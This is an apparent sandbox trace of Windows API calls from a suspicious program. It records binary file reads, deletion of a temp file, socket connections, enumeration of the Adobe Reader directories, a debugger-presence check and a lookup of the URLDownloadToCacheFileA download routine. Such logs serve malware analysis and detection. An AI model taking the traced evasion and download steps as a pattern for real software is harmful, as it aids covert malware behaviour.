Buffer => \x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,225 | 1592 | NtReadFile |
Buffer => \x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83\xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3vPK\x01\x02\x14\x00
\x00\x00\x00\x00\x00\xa1\x95\xde0\xc5\x19\xd8 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,225 | 1592 | NtReadFile |
Buffer => FileHandle => 0x000001e0 |
FAILURE | 3221225489 | |
| 07:45:03,255 | 1592 | DeleteFileA |
FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp6.tmp |
SUCCESS | 0x00000001 | |
| 07:45:03,255 | 1600 | socket |
type => 1 protocol => 6 af => 2 |
SUCCESS | 0x0000018c | |
| 07:45:03,265 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Setup Files\*.* |
SUCCESS | 0x0016c170 | |
| 07:45:03,265 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x05Q\xb9\xe6\x91\xcf\x01`\x05Q\xb9\xe6\x91\xcf\x01\xc0\x13T\xb9\xe6\x91\xcf\x01\xc0\x13T\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00y\x00p\x00t\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x13T\xb9\xe6\x91\xcf\x01\xc0\x13T\xb9\xe6\x91\xcf\x01\xc0\x13T\xb9\xe6\x91\xcf\x01\xc0\x13T\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00L\x00\x00\x00\x00\x00\x00\x00\x10\x00{\x00A\x00C\x007\x006\x00B\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00{\x00A\x00C\x007\x006\x00B\x00A\x008\x006\x00-\x007\x00A\x00D\x007\x00-\x001\x000\x003\x003\x00-\x007\x00B\x004\x004\x00-\x00A\x00B\x000\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:45:03,265 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:03,346 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Setup Files\{AC76BA86-7AD7-1033-7B44-AB0000000001}\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:45:03,346 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xc0\x13T\xb9\xe6\x91\xcf\x01\xc0\x13T\xb9\xe6\x91\xcf\x01\xc0\x13T\xb9\xe6\x91\xcf\x01\xc0\x13T\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:45:03,346 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,346 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,346 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,346 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:03,346 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:03,356 | 1592 | gethostbyname |
Name => unicode.org |
SUCCESS | 0x0016c138 | |
| 07:45:03,356 | 1592 | socket |
type => 1 protocol => 6 af => 2 |
SUCCESS | 0x000001bc | |
| 07:45:03,426 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Common Files\*.* |
SUCCESS | 0x0016e590 | |
| 07:45:03,426 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\x83b>oI\xcd\x01\xb0\x94i(\xf2\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\xb7\xe4\xe6\x91\xcf\x01h\x00\x00\x00\x00\x00\x00\x00paI\xb9\xe6\x91\xcf\x01@\xe9!5\xf2\x91\xcf\x01\xb0\xd9\xcb\xcd\xe6\x91\xcf\x01\xb0\xd9\xcb\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00d\x00o\x00b\x00e\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\xafk>oI\xcd\x01\x00\xff\xbb\x98\xe0\x91\xcf\x01\xd0\x14\x0e\xbe\xd5I\xcd\x01\xd0\x14\x0e\xbe\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:45:03,426 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:03,436 | 1600 | connect |
socket => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:45:03,506 | 1592 | connect |
socket => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,616 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Common Files\Adobe\*.* |
SUCCESS | 0x0016c100 | |
| 07:45:03,616 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00paI\xb9\xe6\x91\xcf\x01@\xe9!5\xf2\x91\xcf\x01\xb0\xd9\xcb\xcd\xe6\x91\xcf\x01\xb0\xd9\xcb\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arp\x00\x00\x00\x00\x00\x00\x00paI\xb9\xe6\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00r\x00o\x00b\x00a\x00t\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00\x90\xd7\x84\xcc\xe6\x91\xcf\x01@\xe9!5\xf2\x91\xcf\x01\x90\xd7\x84\xcc\xe6\x91\xcf\x01\x90\xd7\x84\xcc\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:45:03,616 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:03,686 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:45:03,686 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:45:03,686 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:45:03,686 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:45:03,686 | 1308 | CreateThread |
ThreadId => 360 StartRoutine => 0x0050477f Parameter => 0x00167a18 CreationFlags => 0 |
SUCCESS | 0x00000198 | |
| 07:45:03,686 | 1308 | NtDelayExecution |
Milliseconds => 100 |
SUCCESS | 0x00000000 | |
| 07:45:03,686 | 360 | LdrGetDllHandle |
ModuleHandle => 0x00000000 FileName => urlmon.dll |
FAILURE | 3221225781 | 1 time |
| 07:45:03,706 | 360 | LdrLoadDll |
Flags => 17824292 BaseAddress => 0x7e1e0000 FileName => urlmon.dll |
SUCCESS | 0x00000000 | |
| 07:45:03,706 | 360 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => URLDownloadToCacheFileA FunctionAddress => 0x7e23bd91 ModuleHandle => 0x7e1e0000 |
SUCCESS | 0x00000000 | |
| 07:45:03,706 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Common Files\Adobe\Acrobat\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:45:03,706 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001f0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00paI\xb9\xe6\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00F\x00P\x00r\x00\x00\x00\x00\x00\x00\x00\x00\x00paI\xb9\xe6\x91\xcf\x01\xc0?\xaa\xed\xe6\x91\xcf\x01p\x9d\x88\xcd\xe6\x91\xcf\x01p\x9d\x88\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00t\x00i\x00v\x00e\x00X\x00 |
SUCCESS | 0x00000000 | |
| 07:45:03,706 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:03,716 | 360 | LdrLoadDll |
Flags => 17817444 BaseAddress => 0x5ad70000 FileName => C:\WINDOWS\system32\uxtheme.dll |
SUCCESS | 0x00000000 | |
| 07:45:03,726 | 360 | IsDebuggerPresent | FAILURE | 0x00000000 | ||
| 07:45:03,726 | 360 | LdrLoadDll |
Flags => 17817264 BaseAddress => 0x5ad70000 FileName => uxtheme.dll |
SUCCESS | 0x00000000 | |
| 07:45:03,726 | 360 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | |
| 07:45:03,726 | 360 | ZwMapViewOfSection |
SectionOffset => 0x010fdd98 SectionHandle => 0x000001fc ProcessHandle => 0xffffffff BaseAddress => 0x01100000 |
SUCCESS | 0x00000000 | |
| 07:45:03,736 | 360 | GetSystemMetrics |
SystemMetricIndex => 31 |
SUCCESS | 0x00000019 | 1 time |
| 07:45:03,736 | 360 | RegOpenKeyExA |
Handle => 0x00000202 Registry => 0x80000000 SubKey => PROTOCOLS\Name-Space Handler\ |
SUCCESS | 0x00000000 | |
| 07:45:03,736 | 360 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000000 SubKey => PROTOCOLS\Name-Space Handler\http\ |
FAILURE | 0x00000002 | |
| 07:45:03,736 | 360 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000000 SubKey => PROTOCOLS\Name-Space Handler\*\ |
FAILURE | 0x00000002 | |
| 07:45:03,736 | 360 | RegCloseKey |
Handle => 0x00000202 |
SUCCESS | 0x00000000 | |
| 07:45:03,736 | 360 | RegOpenKeyExW |
Handle => 0x00000200 Registry => 0x80000002 SubKey => Software\Microsoft\Ole |
SUCCESS | 0x00000000 | |
| 07:45:03,736 | 360 | RegQueryValueExW |
Handle => 0x00000200 DataLength => 4 ValueName => MaximumAllowedAllocationSize Type => 17819012 |
FAILURE | 0x00000002 | |
| 07:45:03,736 | 360 | RegCloseKey |
Handle => 0x00000200 |
SUCCESS | 0x00000000 |